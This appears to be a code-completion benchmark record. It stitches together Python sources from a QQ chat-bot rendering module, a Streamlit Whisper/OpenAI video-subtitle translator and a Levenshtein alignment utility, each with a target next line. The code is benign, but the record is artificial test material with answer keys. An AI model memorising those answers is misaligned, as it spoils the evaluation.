self.s3file.get_object(\".keep\")\n if await read_test.read() == test_text:\n logger.info(\"S3 Bucket 可读\")\n else:\n logger.error(\"S3 Bucket 不可读\")\n msg = \"S3 Bucket 不可读\"\n raise S3FileError(msg)\n\n logger.success(\"S3 Bucket 测试完成\")"
},
{
"identifier": "ADBuilder",
"path": "utils/builder.py",
"snippet": "class ADBuilder(Advertisement):\n @classmethod\n async def create_ad(\n cls,\n content: str,\n content_type: int,\n category: AdvertisementCategory,\n source: str,\n expire_days: int = 30,\n weight: int = 1,\n target_audience: list[str] | None = None,\n bid_price: int = 0,\n ) -> str:\n if target_audience is None:\n target_audience = []\n while True:\n ad_id = token_hex(8)\n if await cls.find_one(cls.ad_id == ad_id):\n continue\n break\n\n await cls.insert(\n Advertisement(\n ad_id=ad_id,\n content=content,\n content_type=content_type,\n ad_category=category,\n source=source,\n end_date=datetime.now(CHINA_TZ) + timedelta(days=expire_days) if expire_days else datetime.max,\n weight=weight,\n target_audience=target_audience,\n bid_price=bid_price,\n )\n )\n return ad_id\n\n # 随机抽取广告\n @classmethod\n async def get_ad(\n cls, category: AdvertisementCategory | None = None, target_audience: list[str] | None = None\n ) -> Advertisement | None:\n if target_audience is None:\n target_audience = []\n current_date = datetime.now(CHINA_TZ)\n\n # 构建查询条件\n query = cls.find(\n Eq(cls.is_active, True),\n LTE(cls.start_date, current_date),\n GT(cls.end_date, current_date),\n )\n\n if category:\n query = query.find(Eq(cls.ad_category, category))\n\n if target_audience:\n query = query.find(In(cls.target_audience, target_audience))\n\n # 计算每个广告的调整后的权重\n ads = await query.to_list()\n\n if not ads:\n return None\n\n adjusted_weights = [math.log1p(ad.bid_price) * math.log1p(ad.weight) for ad in ads]\n total_weight = sum(adjusted_weights)\n\n # 根据权重随机选择广告\n probabilities = [w / total_weight for w in adjusted_weights]\n selected_ad = random.choices(ads, weights=probabilities, k=1)\n\n ctx = Context.current\n cid = ctx.client.last_value\n if ctx.scene.path_without_land in {\"guild.channel\", \"guild.user\"}:\n sid = ctx.scene[\"guild\"]\n else:\n sid = ctx.scene[\"group\"]\n\n selected_ad = selected_ad[0]\n selected_ad.views += 1\n await selected_ad.save() # type: ignore\n selected_ad = cast(Advertisement, selected_ad)\n\n await AdDisplayLog.insert(\n AdDisplayLog(\n ad_id=selected_ad.ad_id,\n scene_id=sid,\n client_id=cid,\n target_audience=list(set(selected_ad.target_audience) & set(target_audience)),\n )\n )\n return selected_ad"
},
{
"identifier": "CHINA_TZ",
"path": "utils/datetime.py",
"snippet": "CHINA_TZ = ZoneInfo(\"Asia/Shanghai\")"
},
{
"identifier": "fill_font",
"path": "utils/fonts_provider.py",
"snippet": "async def fill_font(route: Route, request: Request) -> None:\n url = URL(request.url)\n if not url.is_absolute():\n msg = \"字体地址不合法\"\n raise ValueError(msg)\n try:\n logger.debug(f\"Font {url.name} requested\")\n await route.fulfill(\n path=await get_font(url.name),\n content_type=font_mime_map.get(url.suffix),\n )\n except Exception:\n logger.error(f\"找不到字体 {url.name}\")\n await route.fallback()"
},
{
"identifier": "get_cut_str",
"path": "utils/strings.py",
"snippet": "def get_cut_str(input_str: str, cut: int) -> list[str]:\n \"\"\"\n 自动断行, 用于 Pillow 等不会自动换行的场景\n \"\"\"\n punc = \"\"\",,、。.??)》】“\"‘';;::!!·`~%^& \"\"\" # noqa: RUF001\n si = 0\n i = 0\n next_str = input_str\n str_list = []\n\n while re.search(r\"\\n\\n\\n\\n\\n\", next_str):\n next_str = re.sub(r\"\\n\\n\\n\\n\\n\", \"\\n\", next_str)\n for s in next_str:\n si += 1 if s in string.printable else 2\n i += 1\n if not next_str:\n break\n if next_str[0] == \"\\n\":\n next_str = next_str[1:]\n elif s == \"\\n\":\n str_list.append(next_str[: i - 1])\n next_str = next_str[i - 1 :]\n si = 0\n i = 0\n continue\n if si > cut:\n try:\n if next_str[i] in punc:\n i += 1\n except IndexError:\n str_list.append(next_str)\n return str_list\n str_list.append(next_str[:i])\n next_str = next_str[i:]\n si = 0\n i = 0\n str_list.append(next_str)\n i = 0\n non_wrap_str = []\n for p in str_list:\n if not p:\n break\n if p[-1] == \"\\n\":\n p = p[:-1] # noqa: PLW2901\n non_wrap_str.append(p)\n i += 1\n return non_wrap_str"
}
] | import asyncio
import hashlib
import random
import re
from base64 import b64encode
from datetime import datetime, timedelta
from io import BytesIO
from pathlib import Path
from graiax.text2img.playwright import (
HTMLRenderer,
MarkdownConverter,
PageOption,
ScreenshotOption,
convert_text,
)
from graiax.text2img.playwright.renderer import BuiltinCSS
from jinja2 import Template
from launart import Launart
from loguru import logger
from PIL import Image, ImageDraw, ImageFont
from playwright.async_api._generated import Request
from qrcode.image.styledpil import StyledPilImage
from qrcode.main import QRCode
from models.ad import AdvertisementCategory
from services import AiohttpClientService, S3FileService
from utils.builder import ADBuilder
from utils.datetime import CHINA_TZ
from .fonts_provider import fill_font
from .strings import get_cut_str | 2,936 |
# 广告出现的概率
DEFAULT_AD_PROBABILITY = 0.7
font_file = "./static/font/sarasa-mono-sc-semibold.ttf"
font = ImageFont.truetype(font_file, 22)
cache = Path("cache", "t2i")
cache.mkdir(exist_ok=True, parents=True)
qrcode = QRCode(image_factory=StyledPilImage)
qrcode.add_data("https://qun.qq.com/qunpro/robot/share?robot_appid=101985270")
invite_guild: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_guild.save(bio, format="PNG")
guild_b64 = b64encode(bio.getvalue()).decode()
qrcode.clear()
qrcode.add_data("https://qun.qq.com/qunpro/robot/qunshare?robot_appid=101985270&robot_uin=2854214511")
invite_group: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_group.save(bio, format="PNG")
group_b64 = b64encode(bio.getvalue()).decode()
footer_css = Path("./static/css/footer.css").read_text()
html_render = HTMLRenderer(
page_option=PageOption(device_scale_factor=1.5),
screenshot_option=ScreenshotOption(type="jpeg", quality=80, full_page=True, scale="device"),
css=(
BuiltinCSS.reset,
BuiltinCSS.github,
BuiltinCSS.one_dark,
BuiltinCSS.container,
"@font-face{font-family:'harmo';font-weight:300;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Light.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:400;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Regular.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:500;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Medium.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:600;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Bold.ttf') format('truetype');}"
"*{font-family:'harmo',sans-serif}",
"body{background-color:#fafafac0;}",
"@media(prefers-color-scheme:light){.markdown-body{--color-canvas-default:#fafafac0;}}",
footer_css,
),
page_modifiers=[
|
# 广告出现的概率
DEFAULT_AD_PROBABILITY = 0.7
font_file = "./static/font/sarasa-mono-sc-semibold.ttf"
font = ImageFont.truetype(font_file, 22)
cache = Path("cache", "t2i")
cache.mkdir(exist_ok=True, parents=True)
qrcode = QRCode(image_factory=StyledPilImage)
qrcode.add_data("https://qun.qq.com/qunpro/robot/share?robot_appid=101985270")
invite_guild: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_guild.save(bio, format="PNG")
guild_b64 = b64encode(bio.getvalue()).decode()
qrcode.clear()
qrcode.add_data("https://qun.qq.com/qunpro/robot/qunshare?robot_appid=101985270&robot_uin=2854214511")
invite_group: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_group.save(bio, format="PNG")
group_b64 = b64encode(bio.getvalue()).decode()
footer_css = Path("./static/css/footer.css").read_text()
html_render = HTMLRenderer(
page_option=PageOption(device_scale_factor=1.5),
screenshot_option=ScreenshotOption(type="jpeg", quality=80, full_page=True, scale="device"),
css=(
BuiltinCSS.reset,
BuiltinCSS.github,
BuiltinCSS.one_dark,
BuiltinCSS.container,
"@font-face{font-family:'harmo';font-weight:300;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Light.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:400;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Regular.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:500;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Medium.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:600;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Bold.ttf') format('truetype');}"
"*{font-family:'harmo',sans-serif}",
"body{background-color:#fafafac0;}",
"@media(prefers-color-scheme:light){.markdown-body{--color-canvas-default:#fafafac0;}}",
footer_css,
),
page_modifiers=[ | lambda page: page.route(re.compile("^http://font.static.abot/(.+)$"), fill_font), | 5 | 2023-12-16 13:19:56+00:00 | 4k |
Chenyme/Chenyme-AAMT | AAMT.py | [
{
"identifier": "generate_srt_from_result",
"path": "utils/utils.py",
"snippet": "def generate_srt_from_result(result): # 格式化为SRT字幕的形式\r\n segments = result['segments']\r\n srt_content = ''\r\n segment_id = 1\r\n for segment in segments:\r\n start_time = int(segment['start'] * 1000)\r\n end_time = int(segment['end'] * 1000)\r\n text = segment['text']\r\n\r\n srt_content += f\"{segment_id}\\n\"\r\n srt_content += f\"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\\n\"\r\n srt_content += f\"{text}\\n\\n\"\r\n segment_id += 1\r\n\r\n return srt_content\r"
},
{
"identifier": "tmp_filepath",
"path": "utils/utils.py",
"snippet": "def tmp_filepath(uploaded_file): # 虚拟化文件路径\r\n with tempfile.NamedTemporaryFile(delete=False) as tmp_file:\r\n tmp_file.write(uploaded_file.getvalue())\r\n return tmp_file.name\r"
},
{
"identifier": "openai_translate",
"path": "utils/utils.py",
"snippet": "def openai_translate(key, base, result):\r\n llm = ChatOpenAI(openai_api_key=key, openai_api_base=base)\r\n # Prompt\r\n prompt = ChatPromptTemplate(\r\n messages=[\r\n SystemMessagePromptTemplate.from_template(\r\n \"You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!\"\r\n ),\r\n # The `variable_name` here is what must align with memory\r\n MessagesPlaceholder(variable_name=\"chat_history\"),\r\n HumanMessagePromptTemplate.from_template(\"{question}\"),\r\n ]\r\n )\r\n # 设置记忆参数\r\n memory = ConversationBufferWindowMemory(memory_key=\"chat_history\", return_messages=True, k=5)\r\n conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory)\r\n segments = result['segments']\r\n segment_id = 0\r\n for segment in segments:\r\n text = segment['text']\r\n response = conversation({\"question\": text})\r\n result['segments'][segment_id]['text'] = response['text']\r\n segment_id += 1\r\n return result\r"
},
{
"identifier": "srt_mv",
"path": "utils/utils.py",
"snippet": "def srt_mv(cache_dir):\r\n command = ' ffmpeg -i \"' + \"uploaded.mp4\" + '\" -lavfi ' + '\"subtitles=' + 'output.srt' + ':force_style=' + \"'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'\" + '\"' + ' -y -crf 1 -c:a copy \"' + \"output.mp4\" + '\"'\r\n subprocess.run(command, shell=True, cwd=cache_dir)\r"
},
{
"identifier": "cache",
"path": "utils/utils.py",
"snippet": "def cache(cache_dir):\r\n total_size = 0 # 总大小,初始为0\r\n for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹\r\n for file_name in files:\r\n file_path = os.path.join(root, file_name)\r\n total_size += os.path.getsize(file_path)\r\n return total_size\r"
},
{
"identifier": "convert_size",
"path": "utils/utils.py",
"snippet": "def convert_size(size):\r\n if size == 0:\r\n return \"0B\"\r\n size_names = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size, 1024)))\r\n power = math.pow(1024, i)\r\n size = round(size / power, 2)\r\n return f\"{size} {size_names[i]}\"\r"
}
] | import os
import json
import streamlit as st
import whisper
from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size
| 2,123 | # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
srt_content = generate_srt_from_result(result) # 生成SRT字幕内容
with open(cache_dir + "output.srt", 'w', encoding='utf-8') as srt_file: # 将SRT内容写入SRT文件
srt_file.write(srt_content)
srt_mv(cache_dir)
if st.download_button(
label="Click to Download SRT",
data=srt_content.encode('utf-8'),
key='srt_download',
file_name=cache_dir + 'output.srt',
mime='text/srt',
):
st.success("下载成功")
video_file = open(cache_dir + "output.mp4", 'rb')
video_bytes = video_file.read()
st.video(video_bytes)
else:
st.error("请先上传视频!")
# 全局设置
with tab2:
openai_api_key = config["openai_key"]
openai_api_base = config["openai_base"]
whisper_model = config["whisper_model_default"]
st.write("#### Whisper识别设置")
model = {'tiny': 0, 'base': 1, 'small': 2, 'medium': 3, 'large': 4}
option = st.selectbox('选择你要使用的识别模型', ('tiny', 'base', 'small', 'medium', 'large'), index=model[whisper_model])
if option != whisper_model:
config["whisper_model_default"] = option
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("默认模型已切换为:" + option)
st.write("#### OPENAI设置")
new_key = st.text_input("OPENAI-API-KEY:")
new_base = st.text_input("OPENAI-API-BASE:")
if st.button("保存"):
if new_base != openai_api_base and new_base != "":
config["openai_base"] = new_base
openai_api_base = new_base
if new_key != openai_api_key and new_key != "":
config["openai_key"] = new_key
openai_api_key = new_key
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("已保存")
st.write("#### 本地缓存")
| # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
srt_content = generate_srt_from_result(result) # 生成SRT字幕内容
with open(cache_dir + "output.srt", 'w', encoding='utf-8') as srt_file: # 将SRT内容写入SRT文件
srt_file.write(srt_content)
srt_mv(cache_dir)
if st.download_button(
label="Click to Download SRT",
data=srt_content.encode('utf-8'),
key='srt_download',
file_name=cache_dir + 'output.srt',
mime='text/srt',
):
st.success("下载成功")
video_file = open(cache_dir + "output.mp4", 'rb')
video_bytes = video_file.read()
st.video(video_bytes)
else:
st.error("请先上传视频!")
# 全局设置
with tab2:
openai_api_key = config["openai_key"]
openai_api_base = config["openai_base"]
whisper_model = config["whisper_model_default"]
st.write("#### Whisper识别设置")
model = {'tiny': 0, 'base': 1, 'small': 2, 'medium': 3, 'large': 4}
option = st.selectbox('选择你要使用的识别模型', ('tiny', 'base', 'small', 'medium', 'large'), index=model[whisper_model])
if option != whisper_model:
config["whisper_model_default"] = option
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("默认模型已切换为:" + option)
st.write("#### OPENAI设置")
new_key = st.text_input("OPENAI-API-KEY:")
new_base = st.text_input("OPENAI-API-BASE:")
if st.button("保存"):
if new_base != openai_api_base and new_base != "":
config["openai_base"] = new_base
openai_api_base = new_base
if new_key != openai_api_key and new_key != "":
config["openai_key"] = new_key
openai_api_key = new_key
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("已保存")
st.write("#### 本地缓存")
| st.write(f"本地缓存已占用:{convert_size(cache(cache_dir))}")
| 4 | 2023-12-18 04:06:03+00:00 | 4k |
allenai/marg-reviewer | review_worker/aries/util/edit.py | [
{
"identifier": "colorify",
"path": "review_worker/aries/util/color.py",
"snippet": "def colorify(s: str, color: str, bold: bool = False, form=\"html\", tag_side=\"both\"):\n \"\"\"if tag_side is 'left', only the left tag is added. If tag_side irght\n 'right', only the right tag is added. This is useful if, for example,\n a list of tokens needs to be colored without joining the tokens. Raises an\n error if this is not possible for the given form.\"\"\"\n if color is None or form == \"none\":\n return s\n\n m = re.match(r\"#(?P<hexcode>[0-9a-fA-F]{6})\", color)\n valid_ansi = False\n if not m:\n if color in COLOR_TABLE:\n valid_ansi = True\n hex_color = COLOR_TABLE[color][\"hex\"]\n else:\n raise ValueError(\"Invalid color {}\".format(color))\n else:\n hex_color = m.group(\"hexcode\")\n\n left_tag, right_tag = \"\", \"\"\n if form == \"html\":\n bold_code = \"font-weight: bold;\" if bold else \"\"\n left_tag = '<span style=\"color: #{code};{boldness}\">'.format(code=hex_color, boldness=bold_code)\n right_tag = \"</span>\"\n elif form == \"ansi\" and valid_ansi:\n bold_code = \"1\" if bold else \"0\"\n left_tag = \"\\033[{boldness};{code}m\".format(code=COLOR_TABLE[color][\"ansi\"], boldness=bold_code)\n right_tag = \"\\033[0m\"\n else:\n raise ValueError(\"Invalid format {}\".format(form))\n\n if tag_side == \"left\":\n return left_tag + s\n elif tag_side == \"right\":\n return s + right_tag\n elif tag_side == \"both\":\n return left_tag + s + right_tag\n raise ValueError(\"Invalid tag_side {}\".format(tag_side))"
},
{
"identifier": "colorprint",
"path": "review_worker/aries/util/color.py",
"snippet": "def colorprint(s, color=None, bold=False, form=\"ansi\", *print_args, **print_kwargs):\n return print(colorify(s, color, bold=bold, form=form), *print_args, **print_kwargs)"
}
] | import collections
import difflib
import itertools
import numpy as np
import tqdm
from typing import Iterable, List, Tuple, Union
from cffi import FFI
from .color import colorify, colorprint
from _levenshtein import ffi, lib | 2,495 |
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"):
|
def init_levenshtein_c():
ffibuilder = FFI()
ffibuilder.set_source(
"_levenshtein",
r"""
int levenshtein(int *seq1, int seq1_len, int *seq2, int seq2_len, int *v0)
{
// Adapted from https://en.wikipedia.org/wiki/Levenshtein_distance (CC-BY-SA)
// v0 is just a buffer for temporary calculations; easier to
// ask the caller to allocate it than to deal with C mem
// management
int substitutionCost, insertionCost, deletionCost;
int tmpval;
for (int i = 0; i < seq2_len+1; i++) {
v0[i] = i;
}
for (int i = 0; i < seq1_len; i++) {
// calculate v1 (current row distances) from the previous row v0
// first element of v1 is A[i+1][0]
// edit distance is delete (i+1) chars from s to match empty t
tmpval = i + 1;
// use formula to fill in the rest of the row
for(int j = 0; j < seq2_len; j++) {
// calculating costs for A[i+1][j+1]
deletionCost = v0[j + 1] + 1;
insertionCost = tmpval + 1;
substitutionCost = v0[j];
if (seq1[i] != seq2[j]) {
substitutionCost++;
}
v0[j] = tmpval;
tmpval = deletionCost;
if (insertionCost < tmpval) {
tmpval = insertionCost;
}
if (substitutionCost < tmpval) {
tmpval = substitutionCost;
}
}
v0[seq2_len] = tmpval;
}
// after the last swap, the results of v1 are now in v0
return v0[seq2_len];
}
""",
)
ffibuilder.cdef("int levenshtein(int*, int, int*, int, int*);")
# Compile the C module and import it
ffibuilder.compile(verbose=True)
return ffi, lib
levenshtein_ffi, levenshtein_lib = None, None
def levenshtein_distance(seq1, seq2):
# We call a C function for levenshtein via CFFI because it is about 1000x
# faster than the python version (the difference between running in an hour
# vs running in a month)
global levenshtein_ffi, levenshtein_lib
if levenshtein_ffi is None:
levenshtein_ffi, levenshtein_lib = init_levenshtein_c()
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
